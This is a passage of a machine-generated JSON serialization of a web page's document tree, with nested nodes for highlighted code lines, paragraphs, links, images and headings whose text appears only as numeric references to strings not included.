},{"type":28,"tag":116,"props":157486,"children":157487},{"style":370},[157488],{"type":33,"value":1291},{"type":28,"tag":116,"props":157490,"children":157491},{"class":245,"line":1620},[157492,157496,157500,157504,157508,157512,157516,157520,157524,157528],{"type":28,"tag":116,"props":157493,"children":157494},{"style":272},[157495],{"type":33,"value":1626},{"type":28,"tag":116,"props":157497,"children":157498},{"style":370},[157499],{"type":33,"value":141},{"type":28,"tag":116,"props":157501,"children":157502},{"style":272},[157503],{"type":33,"value":1635},{"type":28,"tag":116,"props":157505,"children":157506},{"style":370},[157507],{"type":33,"value":926},{"type":28,"tag":116,"props":157509,"children":157510},{"style":272},[157511],{"type":33,"value":1644},{"type":28,"tag":116,"props":157513,"children":157514},{"style":370},[157515],{"type":33,"value":141},{"type":28,"tag":116,"props":157517,"children":157518},{"style":282},[157519],{"type":33,"value":1653},{"type":28,"tag":116,"props":157521,"children":157522},{"style":370},[157523],{"type":33,"value":313},{"type":28,"tag":116,"props":157525,"children":157526},{"style":272},[157527],{"type":33,"value":1604},{"type":28,"tag":116,"props":157529,"children":157530},{"style":370},[157531],{"type":33,"value":895},{"type":28,"tag":116,"props":157533,"children":157534},{"class":245,"line":1668},[157535],{"type":28,"tag":116,"props":157536,"children":157537},{"style":370},[157538],{"type":33,"value":1674},{"type":28,"tag":116,"props":157540,"children":157541},{"class":245,"line":1677},[157542],{"type":28,"tag":116,"props":157543,"children":157544},{"emptyLinePlaceholder":19},[157545],{"type":33,"value":1044},{"type":28,"tag":116,"props":157547,"children":157548},{"class":245,"line":1685},[157549,157553,157557,157561,157565,157569,157573,157577,157581],{"type":28,"tag":116,"props":157550,"children":157551},{"style":272},[157552],{"type":33,"value":1691},{"type":28,"tag":116,"props":157554,"children":157555},{"style":370},[157556],{"type":33,"value":141},{"type":28,"tag":116,"props":157558,"children":157559},{"style":272},[157560],{"type":33,"value":1700},{"type":28,"tag":116,"props":157562,"children":157563},{"style":370},[157564],{"type":33,"value":141},{"type":28,"tag":116,"props":157566,"children":157567},{"style":282},[157568],{"type":33,"value":1709},{"type":28,"tag":116,"props":157570,"children":157571},{"style":370},[157572],{"type":33,"value":313},{"type":28,"tag":116,"props":157574,"children":157575},{"style":272},[157576],{"type":33,"value":1718},{"type":28,"tag":116,"props":157578,"children":157579},{"style":376},[157580],{"type":33,"value":1418},{"type":28,"tag":116,"props":157582,"children":157583},{"style":370},[157584],{"type":33,"value":1291},{"type":28,"tag":116,"props":157586,"children":157587},{"class":245,"line":1729},[157588,157592,157596,157600,157604,157608,157612],{"type":28,"tag":116,"props":157589,"children":157590},{"style":376},[157591],{"type":33,"value":1735},{"type":28,"tag":116,"props":157593,"children":157594},{"style":272},[157595],{"type":33,"value":1740},{"type":28,"tag":116,"props":157597,"children":157598},{"style":370},[157599],{"type":33,"value":926},{"type":28,"tag":116,"props":157601,"children":157602},{"style":272},[157603],{"type":33,"value":1718},{"type":28,"tag":116,"props":157605,"children":157606},{"style":370},[157607],{"type":33,"value":141},{"type":28,"tag":116,"props":157609,"children":157610},{"style":272},[157611],{"type":33,"value":1757},{"type":28,"tag":116,"props":157613,"children":157614},{"style":370},[157615],{"type":33,"value":384},{"type":28,"tag":116,"props":157617,"children":157618},{"class":245,"line":1764},[157619,157623,157627,157631,157635,157639,157643,157647,157651,157655,157659,157663,157667,157671,157675,157679,157683,157687,157691,157695,157699,157703,157707,157711,157715,157719,157723,157727,157731],{"type":28,"tag":116,"props":157620,"children":157621},{"style":272},[157622],{"type":33,"value":1770},{"type":28,"tag":116,"props":157624,"children":157625},{"style":370},[157626],{"type":33,"value":141},{"type":28,"tag":116,"props":157628,"children":157629},{"style":272},[157630],{"type":33,"value":1779},{"type":28,"tag":116,"props":157632,"children":157633},{"style":370},[157634],{"type":33,"value":926},{"type":28,"tag":116,"props":157636,"children":157637},{"style":563},[157638],{"type":33,"value":1788},{"type":28,"tag":116,"props":157640,"children":157641},{"style":376},[157642],{"type":33,"value":867},{"type":28,"tag":116,"props":157644,"children":157645},{"style":272},[157646],{"type":33,"value":1797},{"type":28,"tag":116,"props":157648,"children":157649},{"style":370},[157650],{"type":33,"value":141},{"type":28,"tag":116,"props":157652,"children":157653},{"style":272},[157654],{"type":33,"value":1806},{"type":28,"tag":116,"props":157656,"children":157657},{"style":370},[157658],{"type":33,"value":141},{"type":28,"tag":116,"props":157660,"children":157661},{"style":282},[157662],{"type":33,"value":1815},{"type":28,"tag":116,"props":157664,"children":157665},{"style":370},[157666],{"type":33,"value":313},{"type":28,"tag":116,"props":157668,"children":157669},{"style":350},[157670],{"type":33,"value":1824},{"type":28,"tag":116,"props":157672,"children":157673},{"style":370},[157674],{"type":33,"value":1829},{"type":28,"tag":116,"props":157676,"children":157677},{"style":376},[157678],{"type":33,"value":885},{"type":28,"tag":116,"props":157680,"children":157681},{"style":1836},[157682],{"type":33,"value":1839},{"type":28,"tag":116,"props":157684,"children":157685},{"style":563},[157686],{"type":33,"value":1844},{"type":28,"tag":116,"props":157688,"children":157689},{"style":376},[157690],{"type":33,"value":867},{"type":28,"tag":116,"props":157692,"children":157693},{"style":272},[157694],{"type":33,"value":1797},{"type":28,"tag":116,"props":157696,"children":157697},{"style":370},[157698],{"type":33,"value":141},{"type":28,"tag":116,"props":157700,"children":157701},{"style":272},[157702],{"type":33,"value":1861},{"type":28,"tag":116,"props":157704,"children":157705},{"style":370},[157706],{"type":33,"value":141},{"type":28,"tag":116,"props":157708,"children":157709},{"style":282},[157710],{"type":33,"value":1815},{"type":28,"tag":116,"props":157712,"children":157713},{"style":370},[157714],{"type":33,"value":313},{"type":28,"tag":116,"props":157716,"children":157717},{"style":350},[157718],{"type":33,"value":1824},{"type":28,"tag":116,"props":157720,"children":157721},{"style":370},[157722],{"type":33,"value":1829},{"type":28,"tag":116,"props":157724,"children":157725},{"style":376},[157726],{"type":33,"value":885},{"type":28,"tag":116,"props":157728,"children":157729},{"style":563},[157730],{"type":33,"value":890},{"type":28,"tag":116,"props":157732,"children":157733},{"style":370},[157734],{"type":33,"value":384},{"type":28,"tag":116,"props":157736,"children":157737},{"class":245,"line":1896},[157738,157742,157746,157750,157754,157758,157762],{"type":28,"tag":116,"props":157739,"children":157740},{"style":370},[157741],{"type":33,"value":1902},{"type":28,"tag":116,"props":157743,"children":157744},{"style":272},[157745],{"type":33,"value":1907},{"type":28,"tag":116,"props":157747,"children":157748},{"style":376},[157749],{"type":33,"value":1418},{"type":28,"tag":116,"props":157751,"children":157752},{"style":282},[157753],{"type":33,"value":1916},{"type":28,"tag":116,"props":157755,"children":157756},{"style":370},[157757],{"type":33,"value":313},{"type":28,"tag":116,"props":157759,"children":157760},{"style":272},[157761],{"type":33,"value":1907},{"type":28,"tag":116,"props":157763,"children":157764},{"style":370},[157765],{"type":33,"value":1929},{"type":28,"tag":116,"props":157767,"children":157768},{"class":245,"line":1932},[157769],{"type":28,"tag":116,"props":157770,"children":157771},{"style":370},[157772],{"type":33,"value":1378},{"type":28,"tag":116,"props":157774,"children":157775},{"class":245,"line":1940},[157776],{"type":28,"tag":116,"props":157777,"children":157778},{"emptyLinePlaceholder":19},[157779],{"type":33,"value":1044},{"type":28,"tag":116,"props":157781,"children":157782},{"class":245,"line":1948},[157783],{"type":28,"tag":116,"props":157784,"children":157785},{"style":370},[157786],{"type":33,"value":1954},{"type":28,"tag":116,"props":157788,"children":157789},{"class":245,"line":1957},[157790,157794],{"type":28,"tag":116,"props":157791,"children":157792},{"style":282},[157793],{"type":33,"value":1963},{"type":28,"tag":116,"props":157795,"children":157796},{"style":370},[157797],{"type":33,"value":1445},{"type":28,"tag":116,"props":157799,"children":157800},{"class":245,"line":1970},[157801,157805,157809],{"type":28,"tag":116,"props":157802,"children":157803},{"style":488},[157804],{"type":33,"value":1976},{"type":28,"tag":116,"props":157806,"children":157807},{"style":376},[157808],{"type":33,"value":789},{"type":28,"tag":116,"props":157810,"children":157811},{"style":488},[157812],{"type":33,"value":506},{"type":28,"tag":116,"props":157814,"children":157815},{"class":245,"line":1987},[157816,157820,157824],{"type":28,"tag":116,"props":157817,"children":157818},{"style":488},[157819],{"type":33,"value":603},{"type":28,"tag":116,"props":157821,"children":157822},{"style":376},[157823],{"type":33,"value":624},{"type":28,"tag":116,"props":157825,"children":157826},{"style":488},[157827],{"type":33,"value":506},{"type":28,"tag":116,"props":157829,"children":157830},{"class":245,"line":2003},[157831,157835,157839],{"type":28,"tag":116,"props":157832,"children":157833},{"style":488},[157834],{"type":33,"value":603},{"type":28,"tag":116,"props":157836,"children":157837},{"style":376},[157838],{"type":33,"value":478},{"type":28,"tag":116,"props":157840,"children":157841},{"style":488},[157842],{"type":33,"value":506},{"type":28,"tag":443,"props":157844,"children":157845},{"id":2019},[157846],{"type":33,"value":2022},{"type":28,"tag":29,"props":157848,"children":157849},{},[157850],{"type":33,"value":2027},{"type":28,"tag":29,"props":157852,"children":157853},{},[157854,157855,157860],{"type":33,"value":2032},{"type":28,"tag":87,"props":157856,"children":157858},{"href":2035,"rel":157857},[91],[157859],{"type":33,"value":2039},{"type":33,"value":141},{"type":28,"tag":201,"props":157862,"children":157863},{"style":203},[157864],{"type":28,"tag":206,"props":157865,"children":157866},{"src":2046,"alt":2047,"style":2048},[],{"type":28,"tag":29,"props":157868,"children":157869},{},[157870],{"type":33,"value":2054},{"type":28,"tag":63,"props":157872,"children":157873},{"id":2057},[157874],{"type":33,"value":2060},{"type":28,"tag":29,"props":157876,"children":157877},{},[157878,157879,157884,157885,157890],{"type":33,"value":2065},{"type":28,"tag":87,"props":157880,"children":157882},{"href":2068,"rel":157881},[91],[157883],{"type":33,"value":2072},{"type":33,"value":2074},{"type":28,"tag":87,"props":157886,"children":157888},{"href":2077,"rel":157887},[91],[157889],{"type":33,"value":2077},{"type":33,"value":2082},{"type":28,"tag":201,"props":157892,"children":157893},{"style":203},[157894],{"type":28,"tag":206,"props":157895,"children":157896},{"src":2088,"alt":2047,"style":2089},[],{"type":28,"tag":29,"props":157898,"children":157899},{},[157900],{"type":33,"value":2095},{"type":28,"tag":2097,"props":157902,"children":157903},{"src":2099,"alt":2100},[],{"type":28,"tag":29,"props":157905,"children":157906},{},[157907],{"type":33,"value":2106},{"type":28,"tag":2108,"props":157909,"children":157910},{},[157911,157915,157919],{"type":28,"tag":459,"props":157912,"children":157913},{},[157914],{"type":33,"value":2115},{"type":28,"tag":459,"props":157916,"children":157917},{},[157918],{"type":33,"value":2120},{"type":28,"tag":459,"props":157920,"children":157921},{},[157922],{"type":33,"value":2125},{"type":28,"tag":29,"props":157924,"children":157925},{},[157926],{"type":33,"value":2130},{"type":28,"tag":63,"props":157928,"children":157929},{"id":2133},[157930],{"type":33,"value":2136},{"type":28,"tag":29,"props":157932,"children":157933},{},[157934,157935,157940],{"type":33,"value":2141},{"type":28,"tag":98,"props":157936,"children":157938},{"className":157937},[],[157939],{"type":33,"value":2147},{"type":33,"value":2149},{"type":28,"tag":234,"props":157942,"children":157943},{"className":236,"code":2152,"language":238,"meta":7,"style":7},[157944],{"type":28,"tag":98,"props":157945,"children":157946},{"__ignoreMap":7},[157947,157966,157993,158024,158075,158174,158185,158196],{"type":28,"tag":116,"props":157948,"children":157949},{"class":245,"line":246},[157950,157954,157958,157962],{"type":28,"tag":116,"props":157951,"children":157952},{"style":376},[157953],{"type":33,"value":2164},{"type":28,"tag":116,"props":157955,"children":157956},{"style":339},[157957],{"type":33,"value":2169},{"type":28,"tag":116,"props":157959,"children":157960},{"style":282},[157961],{"type":33,"value":2174},{"type":28,"tag":116,"props":157963,"children":157964},{"style":266},[157965],{"type":33,"value":1068},{"type":28,"tag":116,"props":157967,"children":157968},{"class":245,"line":256},[157969,157973,157977,157981,157985,157989],{"type":28,"tag":116,"props":157970,"children":157971},{"style":260},[157972],{"type":33,"value":2186},{"type":28,"tag":116,"props":157974,"children":157975},{"style":266},[157976],{"type":33,"value":269},{"type":28,"tag":116,"props":157978,"children":157979},{"style":282},[157980],{"type":33,"value":2195},{"type":28,"tag":116,"props":157982,"children":157983},{"style":266},[157984],{"type":33,"value":1540},{"type":28,"tag":116,"props":157986,"children":157987},{"style":282},[157988],{"type":33,"value":2204},{"type":28,"tag":116,"props":157990,"children":157991},{"style":266},[157992],{"type":33,"value":290},{"type":28,"tag":116,"props":157994,"children":157995},{"class":245,"line":293},[157996,158000,158004,158008,158012,158016,158020],{"type":28,"tag":116,"props":157997,"children":157998},{"style":339},[157999],{"type":33,"value":2216},{"type":28,"tag":116,"props":158001,"children":158002},{"style":272},[158003],{"type":33,"value":2221},{"type":28,"tag":116,"props":158005,"children":158006},{"style":370},[158007],{"type":33,"value":2226},{"type":28,"tag":116,"props":158009,"children":158010},{"style":563},[158011],{"type":33,"value":2231},{"type":28,"tag":116,"props":158013,"children":158014},{"style":1836},[158015],{"type":33,"value":1839},{"type":28,"tag":116,"props":158017,"children":158018},{"style":563},[158019],{"type":33,"value":2240},{"type":28,"tag":116,"props":158021,"children":158022},{"style":370},[158023],{"type":33,"value":2245},{"type":28,"tag":116,"props":158025,"children":158026},{"class":245,"line":361},[158027,158031,158035,158039,158043,158047,158051,158055,158059,158063,158067,158071],{"type":28,"tag":116,"props":158028,"children":158029},{"style":563},[158030],{"type":33,"value":2253},{"type":28,"tag":116,"props":158032,"children":158033},{"style":370},[158034],{"type":33,"value":2258},{"type":28,"tag":116,"props":158036,"children":158037},{"style":266},[158038],{"type":33,"value":2263},{"type":28,"tag":116,"props":158040,"children":158041},{"style":370},[158042],{"type":33,"value":2268},{"type":28,"tag":116,"props":158044,"children":158045},{"style":563},[158046],{"type":33,"value":2273},{"type":28,"tag":116,"props":158048,"children":158049},{"style":370},[158050],{"type":33,"value":2258},{"type":28,"tag":116,"props":158052,"children":158053},{"style":266},[158054],{"type":33,"value":2263},{"type":28,"tag":116,"props":158056,"children":158057},{"style":370},[158058],{"type":33,"value":2268},{"type":28,"tag":116,"props":158060,"children":158061},{"style":563},[158062],{"type":33,"value":2290},{"type":28,"tag":116,"props":158064,"children":158065},{"style":1836},[158066],{"type":33,"value":1839},{"type":28,"tag":116,"props":158068,"children":158069},{"style":563},[158070],{"type":33,"value":2240},{"type":28,"tag":116,"props":158072,"children":158073},{"style":370},[158074],{"type":33,"value":2245},{"type":28,"tag":116,"props":158076,"children":158077},{"class":245,"line":387},[158078,158082,158086,158090,158094,158098,158102,158106,158110,158114,158118,158122,158126,158130,158134,158138,158142,158146,158150,158154,158158,158162,158166,158170],{"type":28,"tag":116,"props":158079,"children":158080},{"style":563},[158081],{"type":33,"value":2253},{"type":28,"tag":116,"props":158083,"children":158084},{"style":370},[158085],{"type":33,"value":2258},{"type":28,"tag":116,"props":158087,"children":158088},{"style":266},[158089],{"type":33,"value":2263},{"type":28,"tag":116,"props":158091,"children":158092},{"style":370},[158093],{"type":33,"value":2268},{"type":28,"tag":116,"props":158095,"children":158096},{"style":563},[158097],{"type":33,"value":2326},{"type":28,"tag":116,"props":158099,"children":158100},{"style":370},[158101],{"type":33,"value":2258},{"type":28,"tag":116,"props":158103,"children":158104},{"style":266},[158105],{"type":33,"value":2335},{"type":28,"tag":116,"props":158107,"children":158108},{"style":370},[158109],{"type":33,"value":2340},{"type":28,"tag":116,"props":158111,"children":158112},{"style":376},[158113],{"type":33,"value":379},{"type":28,"tag":116,"props":158115,"children":158116},{"style":260},[158117],{"type":33,"value":2349},{"type":28,"tag":116,"props":158119,"children":158120},{"style":376},[158121],{"type":33,"value":379},{"type":28,"tag":116,"props":158123,"children":158124},{"style":260},[158125],{"type":33,"value":2358},{"type":28,"tag":116,"props":158127,"children":158128},{"style":266},[158129],{"type":33,"value":269},{"type":28,"tag":116,"props":158131,"children":158132},{"style":563},[158133],{"type":33,"value":2367},{"type":28,"tag":116,"props":158135,"children":158136},{"style":370},[158137],{"type":33,"value":2258},{"type":28,"tag":116,"props":158139,"children":158140},{"style":266},[158141],{"type":33,"value":2376},{"type":28,"tag":116,"props":158143,"children":158144},{"style":370},[158145],{"type":33,"value":2268},{"type":28,"tag":116,"props":158147,"children":158148},{"style":563},[158149],{"type":33,"value":2385},{"type":28,"tag":116,"props":158151,"children":158152},{"style":266},[158153],{"type":33,"value":2390},{"type":28,"tag":116,"props":158155,"children":158156},{"style":370},[158157],{"type":33,"value":2268},{"type":28,"tag":116,"props":158159,"children":158160},{"style":563},[158161],{"type":33,"value":2399},{"type":28,"tag":116,"props":158163,"children":158164},{"style":1836},[158165],{"type":33,"value":1839},{"type":28,"tag":116,"props":158167,"children":158168},{"style":563},[158169],{"type":33,"value":2240},{"type":28,"tag":116,"props":158171,"children":158172},{"style":370},[158173],{"type":33,"value":2245},{"type":28,"tag":116,"props":158175,"children":158176},{"class":245,"line":400},[158177,158181],{"type":28,"tag":116,"props":158178,"children":158179},{"style":563},[158180],{"type":33,"value":2419},{"type":28,"tag":116,"props":158182,"children":158183},{"style":266},[158184],{"type":33,"value":384},{"type":28,"tag":116,"props":158186,"children":158187},{"class":245,"line":614},[158188,158192],{"type":28,"tag":116,"props":158189,"children":158190},{"style":282},[158191],{"type":33,"value":2431},{"type":28,"tag":116,"props":158193,"children":158194},{"style":266},[158195],{"type":33,"value":2436},{"type":28,"tag":116,"props":158197,"children":158198},{"class":245,"line":631},[158199],{"type":28,"tag":116,"props":158200,"children":158201},{"style":266},[158202],{"type":33,"value":2444},{"type":28,"tag":29,"props":158204,"children":158205},{},[158206,158207,158212,158213,158218,158219,158224],{"type":33,"value":2449},{"type":28,"tag":98,"props":158208,"children":158210},{"className":158209},[],[158211],{"type":33,"value":2455},{"type":33,"value":2457},{"type":28,"tag":98,"props":158214,"children":158216},{"className":158215},[],[158217],{"type":33,"value":2455},{"type":33,"value":2464},{"type":28,"tag":98,"props":158220,"children":158222},{"className":158221},[],[158223],{"type":33,"value":2470},{"type":33,"value":2472},{"type":28,"tag":29,"props":158226,"children":158227},{},[158228,158229,158234],{"type":33,"value":2477},{"type":28,"tag":87,"props":158230,"children":158232},{"href":2480,"rel":158231},[91],[158233],{"type":33,"value":2484},{"type":33,"value":141},{"type":28,"tag":29,"props":158236,"children":158237},{},[158238],{"type":33,"value":2490},{"type":28,"tag":29,"props":158240,"children":158241},{},[158242,158243,158248],{"type":33,"value":2495},{"type":28,"tag":98,"props":158244,"children":158246},{"className":158245},[],[158247],{"type":33,"value":2501},{"type":33,"value":2503},{"type":28,"tag":75,"props":158250,"children":158251},{"id":2506},[158252],{"type":33,"value":2509},{"type":28,"tag":29,"props":158254,"children":158255},{},[158256],{"type":33,"value":2514},{"type":28,"tag":2516,"props":158258,"children":158259},{},[158260],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":158262},[158263,158267,158270,158271],{"id":65,"depth":256,"text":68,"children":158264},[158265,158266],{"id":77,"depth":293,"text":80},{"id":158,"depth":293,"text":161},{"id":191,"depth":256,"text":194,"children":158268},[158269],{"id":414,"depth":293,"text":417},{"id":2057,"depth":256,"text":2060},{"id":2133,"depth":256,"text":2136,"children":158272},[158273],{"id":2506,"depth":293,"text":2509},1781797430288]